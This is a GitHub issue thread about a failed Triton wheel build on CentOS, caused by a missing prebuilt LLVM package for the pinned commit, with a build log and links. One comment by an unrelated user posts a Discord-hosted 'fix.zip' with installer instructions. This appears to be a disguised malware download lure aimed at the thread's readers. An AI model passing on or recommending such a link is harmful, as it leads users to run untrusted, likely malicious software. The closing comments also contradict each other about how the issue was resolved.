### ISSUE TITLE
[2.5] Triton Wheel build failed due to LLVM pin commit does not exist on centOS

### ISSUE THREAD

**Issue by Stonepia** [intel/intel-xpu-backend-for-triton#2095]
Seems that OpenAI server does not have the former pre-built llvm package on centOS. Thus current CI would complain the following:

```
# Build Triton Wheel
downloading and extracting https://github.com/pybind/pybind11/archive/refs/tags/v2.13.1.tar.gz ...
downloading and extracting https://oaitriton.blob.core.windows.net/public/llvm-builds/llvm-ce80c80d-centos-x64.tar.gz ...
error: HTTP Error 404: The specified blob does not exist.

Traceback (most recent call last):
  File "/pytorch/.github/scripts/build_triton_wheel.py", line 225, in <module>
    main()
  File "/pytorch/.github/scripts/build_triton_wheel.py", line 212, in main
    build_triton(
  File "/pytorch/.github/scripts/build_triton_wheel.py", line 182, in build_triton
    check_call(
  File "/opt/python/cp38-cp38/lib/python3.8/subprocess.py", line 364, in check_call
    raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command '['/opt/python/cp38-cp38/bin/python', 'setup.py', 'bdist_wheel']' returned non-zero exit status
```

This is because the [llvm-hash.txt](https://github.com/intel/intel-xpu-backend-for-triton/blob/release/2.5.0/cmake/llvm-hash.txt) pins the llvm to ce80c80dca45c7b4636a3e143973e2c6cbdb2884. 

The above pin commit has ubuntu version, but NO centos version. i.e.,

```
# CentOS Fail due to no blob
https://oaitriton.blob.core.windows.net/public/llvm-builds/llvm-ce80c80d-centos-x64.tar.gz
# Ubuntu Pass
 https://oaitriton.blob.core.windows.net/public/llvm-builds/llvm-ce80c80d-ubuntu-x64.tar.gz
```

As a reference, currently, CUDA/ROCM uses the pin commit as [10dc3a8e916d73291269e5e2b82dd22681489aa1](https://github.com/amjames/triton/blob/6cd3248e80bb659a69dfaaeae1f69a42ce52c3c3/cmake/llvm-hash.txt). So they could correctly download the llvm package.  We still need the centOS to follow PyTorch's CI convention.

For the full log, please refer to the [CI page](https://github.com/pytorch/pytorch/actions/runs/10625439846/job/29464957730?pr=134074#step:7:862)

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Stonepia** [comment]
Closed as this should be a network error in IDC. Sorry for the disturbance.

**Comment by Stonepia** [comment]
Related issue on openAI: https://github.com/triton-lang/triton/issues/4550

**Comment by Stonepia** [comment]
Thanks for the quick fix! We have verified and close this issue.
